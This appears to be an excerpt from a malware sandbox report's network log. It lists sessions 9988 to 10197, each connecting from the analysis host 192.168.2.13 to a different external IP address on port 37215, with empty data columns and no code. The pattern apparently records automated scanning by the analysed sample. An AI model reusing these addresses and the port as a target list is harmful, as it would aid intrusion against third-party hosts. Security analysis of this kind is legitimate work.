                                                  9988192.168.2.1346530157.201.6.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9989192.168.2.1337280114.112.32.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9990192.168.2.1345022203.21.33.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9991192.168.2.1335744222.150.9.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9992192.168.2.1355638157.93.219.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9993192.168.2.1353080157.149.83.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9994192.168.2.1347734157.227.30.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9995192.168.2.1350164197.117.72.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9996192.168.2.1352660167.149.161.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9997192.168.2.1335264157.209.128.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9998192.168.2.1333458197.185.63.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9999192.168.2.1336162206.74.169.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10000192.168.2.1333224145.57.45.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10001192.168.2.1343412197.124.218.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10002192.168.2.134590443.96.55.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10003192.168.2.1337888197.90.44.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10004192.168.2.133528813.106.146.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10005192.168.2.1341304197.195.183.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10006192.168.2.135394041.17.38.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10007192.168.2.136048441.15.131.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10008192.168.2.135692841.208.3.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10009192.168.2.135986082.56.234.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10010192.168.2.1345746197.184.212.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10011192.168.2.1338680197.79.25.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10012192.168.2.13347184.125.75.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10013192.168.2.135657841.137.240.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10014192.168.2.1352166157.176.43.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10015192.168.2.134451841.251.219.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10016192.168.2.1339562197.119.54.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10017192.168.2.1339432197.105.44.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10018192.168.2.1338328157.20.54.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10019192.168.2.135740051.102.170.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10020192.168.2.1346066157.129.83.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10021192.168.2.1337816157.5.231.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10022192.168.2.1335920157.55.64.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10023192.168.2.1356956156.34.7.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10024192.168.2.134105841.123.100.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10025192.168.2.134960041.38.26.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10026192.168.2.1343442157.75.144.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10027192.168.2.134890641.132.62.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10028192.168.2.1355084157.146.165.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10029192.168.2.1335600147.74.108.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10030192.168.2.136090041.21.112.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10031192.168.2.133559241.154.70.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10032192.168.2.1343952161.230.233.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10033192.168.2.133995441.143.197.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10034192.168.2.1341700156.167.105.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10035192.168.2.1334138102.125.119.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10036192.168.2.133601641.101.136.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10037192.168.2.136082441.88.87.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10038192.168.2.133893645.156.194.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10039192.168.2.1341548197.117.108.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10040192.168.2.1345546197.135.244.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10041192.168.2.1351692197.186.169.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10042192.168.2.1357940157.92.167.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10043192.168.2.1348674147.251.160.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10044192.168.2.1360896157.23.99.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10045192.168.2.1358068157.56.221.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10046192.168.2.1348400140.62.95.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10047192.168.2.1351712140.153.148.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10048192.168.2.1338480188.193.210.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10049192.168.2.1357494199.130.116.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10050192.168.2.1350572197.115.39.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10051192.168.2.1351262116.133.134.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10052192.168.2.1340878223.52.105.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10053192.168.2.1337116197.172.56.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10054192.168.2.1338704157.151.117.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10055192.168.2.1358082157.105.129.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10056192.168.2.1340362157.142.149.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10057192.168.2.1360418157.120.26.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10058192.168.2.1360800157.127.197.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10059192.168.2.1359628115.241.41.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10060192.168.2.135748041.71.74.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10061192.168.2.136095634.86.101.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10062192.168.2.1347334157.75.230.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10063192.168.2.1347920164.117.110.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10064192.168.2.1339152197.244.48.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10065192.168.2.133617054.45.75.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10066192.168.2.1347702197.178.222.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10067192.168.2.1348294197.110.83.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10068192.168.2.1357338197.105.218.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10069192.168.2.1343290181.32.167.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10070192.168.2.1338616111.6.209.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10071192.168.2.1346784114.176.14.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10072192.168.2.1360756197.37.243.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10073192.168.2.133746041.53.150.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10074192.168.2.133731641.43.232.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10075192.168.2.1340684130.198.134.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10076192.168.2.135295241.64.186.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10077192.168.2.1341436197.227.107.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10078192.168.2.134656641.255.167.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10079192.168.2.1338992157.237.98.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10080192.168.2.134652441.94.65.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10081192.168.2.133385069.83.239.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10082192.168.2.1349652157.214.40.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10083192.168.2.1341750197.58.2.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10084192.168.2.1353220157.187.55.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10085192.168.2.1353634197.216.231.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10086192.168.2.1337794157.142.31.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10087192.168.2.134937044.149.30.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10088192.168.2.135522041.183.147.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10089192.168.2.1333666157.103.56.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10090192.168.2.133617036.41.68.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10091192.168.2.135545267.248.17.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10092192.168.2.1345992157.139.72.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10093192.168.2.133817041.125.131.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10094192.168.2.135979241.31.221.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10095192.168.2.1335554157.76.16.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10096192.168.2.1342042132.231.56.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10097192.168.2.1333302197.46.126.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10098192.168.2.1360482197.17.60.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10099192.168.2.133953641.56.53.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10100192.168.2.135072825.209.65.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10101192.168.2.1347690157.26.244.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10102192.168.2.1336540197.235.103.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10103192.168.2.1337808197.72.223.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10104192.168.2.1334718197.57.220.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10105192.168.2.134810441.131.34.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10106192.168.2.1349662157.119.130.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10107192.168.2.1355978117.1.215.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10108192.168.2.133511441.179.150.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10109192.168.2.134932841.72.129.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10110192.168.2.1336464157.191.168.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10111192.168.2.1345106157.31.232.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10112192.168.2.133537841.184.143.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10113192.168.2.1339364218.224.9.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10114192.168.2.1357946157.225.189.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10115192.168.2.134951641.210.180.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10116192.168.2.1334096197.7.238.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10117192.168.2.1338548197.48.88.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10118192.168.2.1335610197.145.65.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10119192.168.2.1340088157.223.160.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10120192.168.2.134720441.76.89.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10121192.168.2.1354678157.159.32.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10122192.168.2.135614641.151.53.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10123192.168.2.133873463.171.216.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10124192.168.2.134467451.127.78.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10125192.168.2.134100841.112.168.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10126192.168.2.1352194157.160.115.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10127192.168.2.135802041.224.172.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10128192.168.2.134098441.11.93.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10129192.168.2.1357182181.152.16.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10130192.168.2.134796081.230.136.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10131192.168.2.135622641.104.118.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10132192.168.2.1350316157.53.2.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10133192.168.2.135344699.187.24.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10134192.168.2.1358136201.130.92.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10135192.168.2.1346506153.172.0.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10136192.168.2.133734041.150.252.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10137192.168.2.1352030157.199.130.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10138192.168.2.1353794161.71.163.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10139192.168.2.135978241.47.179.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10140192.168.2.1344150122.122.19.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10141192.168.2.1342760205.31.221.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10142192.168.2.1347216157.146.102.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10143192.168.2.1341566197.13.38.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10144192.168.2.134278041.157.148.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10145192.168.2.133789841.161.98.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10146192.168.2.1355634220.239.82.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10147192.168.2.1353746196.26.161.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10148192.168.2.134552854.10.86.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10149192.168.2.135416265.79.82.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10150192.168.2.1359182157.58.247.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10151192.168.2.135706041.104.169.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10152192.168.2.1343604157.211.232.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10153192.168.2.135742441.217.223.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10154192.168.2.135768041.75.238.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10155192.168.2.134472641.240.18.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10156192.168.2.134988840.191.36.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10157192.168.2.1337970173.34.105.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10158192.168.2.1350238141.9.141.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10159192.168.2.1357262157.186.194.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10160192.168.2.1337598197.9.172.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10161192.168.2.133473041.226.247.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10162192.168.2.135601841.223.55.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10163192.168.2.1356642197.198.234.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10164192.168.2.133602672.64.203.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10165192.168.2.1339574197.174.123.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10166192.168.2.1334304157.112.93.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10167192.168.2.133425264.83.56.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10168192.168.2.1332918157.78.38.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10169192.168.2.135607241.76.99.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10170192.168.2.1345378197.244.152.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10171192.168.2.1344382157.190.68.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10172192.168.2.135654041.122.102.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10173192.168.2.1360052157.7.237.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10174192.168.2.1352038157.113.185.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10175192.168.2.135396441.135.220.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10176192.168.2.136013641.254.167.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10177192.168.2.1360248197.145.35.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10178192.168.2.1333378197.32.155.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10179192.168.2.133765890.38.193.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10180192.168.2.1344912157.148.131.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10181192.168.2.1337376157.168.21.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10182192.168.2.1345902157.212.64.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10183192.168.2.135788841.240.70.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10184192.168.2.135391453.222.7.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10185192.168.2.1340366197.104.149.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10186192.168.2.1346368197.124.154.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10187192.168.2.1334276197.60.159.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10188192.168.2.1358996197.51.238.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10189192.168.2.135534441.236.89.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10190192.168.2.135521041.161.10.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10191192.168.2.1345004157.119.16.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10192192.168.2.1349078197.45.191.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10193192.168.2.1342902197.250.127.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10194192.168.2.134421841.147.27.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10195192.168.2.1338380197.148.98.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10196192.168.2.1353062197.242.117.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10197192.168.2.134239841.9.254.9237215
